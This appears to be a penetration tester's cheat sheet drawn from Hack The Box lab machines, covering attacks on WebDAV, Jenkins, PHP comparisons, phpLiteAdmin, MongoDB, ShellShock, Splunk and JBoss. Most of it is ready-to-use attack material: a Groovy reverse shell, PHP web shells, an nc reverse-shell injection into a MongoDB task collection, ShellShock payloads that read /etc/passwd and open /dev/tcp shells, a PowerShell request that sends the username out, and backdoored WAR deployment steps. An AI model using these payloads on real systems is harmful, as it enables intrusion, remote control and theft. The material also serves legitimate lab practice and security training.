Useful Commands

• Testing for code execution :sudo tcpdump -i tun0 ip proto \\icmp -vv

• powershell.exe Invoke-WebRequest -URI http://<URL>/$env:UserName

  • $env:userdnsdomain

Decryption

• https://quipqiup.com

Exploiting HTTP PUT Method

WebDAV

• Enumerate PUT Method : Allowed File Types

kali@kali:~/HTB/Grandpa$ davtest -url 10.10.10.14
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                10.10.10.14
********************************************************
NOTE    Random string for this session: aW_9mlHPNp8nXu
********************************************************
 Creating directory
MKCOL           FAIL
********************************************************
 Sending test files
PUT     pl      FAIL
PUT     jhtml   FAIL
PUT     txt     FAIL
PUT     html    FAIL
PUT     cfm     FAIL
PUT     cgi     FAIL
PUT     aspx    FAIL
PUT     asp     FAIL
PUT     shtml   FAIL
PUT     jsp     FAIL
PUT     php     FAIL

Drupal Code Exec

• Authentication required

Jenkins

• Reference: HTB Jeeves

Script Console

• Execute Groovy script reverse shell on the server

String host="<IP>"; int port=9001; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close()

PHP Type Juggling

Method 1

• ‘==’ operator : Loose comparison

• ‘===’ operator: Strict comparsion (Fix)

• Type juggling means If PHP decides that both operands look like numbers, even if they are actually strings, it will convert them both and perform a numeric comparison.

• PHP sees a number (0), followed by the letter "e", and it converts the MD5 string to exponential notation (e.g. 0462097431906509019562988736854). Because both MD5 hashes start with "0e", they both evaluate to 0, making them numerically equivalent.

• When magic hashes are compared against the hash of the actual value, and if they both are treated as “0” and therefore evaluated as true, you will be able to log into the account without the valid password.

• Reference:

  • https://www.whitehatsec.com/blog/magic-hashes/

  • https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/

Method 2

• Sending in the password POST data as an array.

username=admin&password=admin

Change this to:

username=admin&password[]=

Explaination:PHP is generous with how it handles comparing different types of data. So if the PHP is doing a string compare of a password from a database (or hard codeded as is the case here) and the user input, it might look like this:

if(strcmp($_REQUEST['password'], $password) == 0)

strcmp returns where the two strings differ, as I can see in an interactive PHP terminal (run php -a):

php > strcmp("admin", "0xdf");
php > echo strcmp("admin", "0xdf");  //5-4=1
1
php > echo strcmp("admin", "admin0xdf");
-4
php > echo strcmp("admin", "admin");
0

If I pass in an array as one of the strings, PHP fails:

php > echo strcmp(array(), "admin");
PHP Warning:  strcmp() expects parameter 1 to be string, array given in php shell code on line 1

However, it is actually returning a NULL, and if that NULL is then compared to 0, it evaluates true:

php > if (strcmp(array(), "admin") == 0) { echo "oops"; }
PHP Warning:  strcmp() expects parameter 1 to be string, array given in php shell code on line 1
oops

phpLiteAdmin v1.9

• Requires Authentication + LFI

• https://www.exploit-db.com/exploits/24044

Exploitation:

• Create a database:

• Create a table with 1 field

• Create a field, change the Type to TEXT, and enter our script:

  • <?php echo shell_exec($_GET["cmd"]); exit; ?>

  • <?php system($_REQUEST["cmd"]);?>

• Exploit using LFI Vulnerability

  • notes=/ninevehNotes/../../../var/tmp/hack.php&cmd=id

MongoDB

• Default Port:27017

#Connect
mongo -u <username> -p <password> <IP> <db-name>
mongo --port <port> -u <username> -p <password> <IP>

Commands

db
use <db-name>
show tables
show collections

#Insert single document: 
db.<collectionName>.insertOne({field1: "value", field2: "value"})
#Insert multiple docs
db.<collectionName>.insert([{field1: "value1"}, {field1: "value2"}])

#cmd is used here based on the cron job file.
db.tasks.insertOne({ cmd: "/bin/bash /tmp/shell.sh" });
db.tasks.insert({ cmd : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9001 >/tmp/f" });

#To verify if command has been run. Should be empty if command is run
db.tasks.find()

Payload

msfvenom -p cmd/unix/reverse_python lhost=10.10.14.13 LHOST=9001 R > shell.sh

ShellShock Vulnerability [CVE-2014-6271]

• This vulnerability impacts Bash. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface "CGI".

• CGIs commonly use Python or Perl but it's not uncommon to find (on old servers), CGI written in Shell or even C.

• When you call a CGI, the web server (Apache here) will start a new process and run the CGI. Here it will start a Bash process and run the CGI script.

• Apache needs to pass information to the CGI script. To do so, it uses environment variables. Environment variables are available inside the CGI script. It allows Apache to easily pass every headers (amongst other information) to the CGI. If you have a HTTP header named Blah in your request, you will have an environment variable named HTTP_BLAH available in your CGI.

Fingerprint directories such as /cgi-sys, /cgi-mod, /cgi-bin,/session_login.cgi etc.

Theory

The source of the issue is that Bash can have internal function declaration in its environment variable.

First, we need to declare that the environment variable is a function using (). Then we will add an empty body for the function. Finally, we can start adding the command we want to run after the function declaration. More details can be found in the following email on oss-sec

Apache uses environment variables to pass headers to the CGI. Since it's a Bash based CGI, we will be able to run arbitrary command by declaring an empty function and add a command after this declaration.

Exploitation

• Vulnerable Headers:

  • Referrer

  • User-Agent

gobuster dir -w /directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -x sh,cgi

nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

#Payload
()<space>{ :;};
() { :;}; <Bash Command>

() {: ;}; echo $(</etc/passwd)
() { :;}; echo; /usr/bin/id;

() { :;}; echo; /usr/bin/wget http://<IP>
() { :;}; /bin/sh -i >& /dev/tcp/10.10.14.13/9002 0>&1
() { ignored;};/bin/sh -i >& /dev/10.10.14.13/9001 0>&1

#Reverse Shell
#CGI scripts are perl script, so, if you have compromised a server that can execute .cgi 
scripts you can upload a perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl), 
change the extension from .pl to .cgi, give execute permissions (chmod +x) and access the 
reverse shell from the web browser to execute it.

• () { ignored;}; is the ShellShock exploit

• /bin/bash -i is an interactive Bash session

• >& /dev/tcp/<IP>/<PORT>redirect standard output and standard error to the remote host (i.e.: /dev/tcp/1.2.3.4/8080 redirect the bash session to IP 1.2.3.4 on TCP port 8080)

• 0>&1 read the standard input. This should be 0<&1 but it works well in both cases.

• Reference: HTB - Beep

• Reference Blog: http://www.fantaghost.com/exploiting-shellshock-getting-reverse-shell

Splunk 7.0

• Requires authenticated access to management console.

• Download the release from https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz

• Navigate to the "Manage Apps" and click on "Install app from file". Upload this file.

Reference:

• https://www.n00py.io/2018/10/popping-shells-on-splunk/

JBoss

Admin-Console

Check for default credentials : admin::admin.

• With admin privileges, we can upload a war file locally and gain a web shell.

• Once uploaded, activate the WAR file within the console, post which the file can be accessed through browser.

Default JMX-Console

Navigate to the JMX Console on the target host (http://<URL:8080>/jmx-console/)

If the JMX-Console is not password-protected, a malicious WAR file can be requested from an attacker controlled server. This WAR file is downloaded and automatically deployed onto the Jboss server. This can be done via 2 methods :

• Search for service=MainDeployer [Jboss.system] (Walkthrough: Reference)

• Search for : flavor=URL,type=DeploymentScanner[Jboss.deployment] (Walkthrough: Reference)

Exploitation

• Download a WAR file backdoor.

  • SecurityRiskAdvisors

  • JSP webshell : Fuzzdb

• Host the malicious WAR file on an attacker controlled server. (python3 -m http.server )

• Invoke a request to the hosted file. (java.net.URL)

• Sometimes outbound requests to the internet may be blocked. In that case host the file locally.

• If successful, you can access the uploaded file at <URL>:8080/cmd/cmd.jsp

• Get the command GUI by following the instructions from the WAR file's git repo.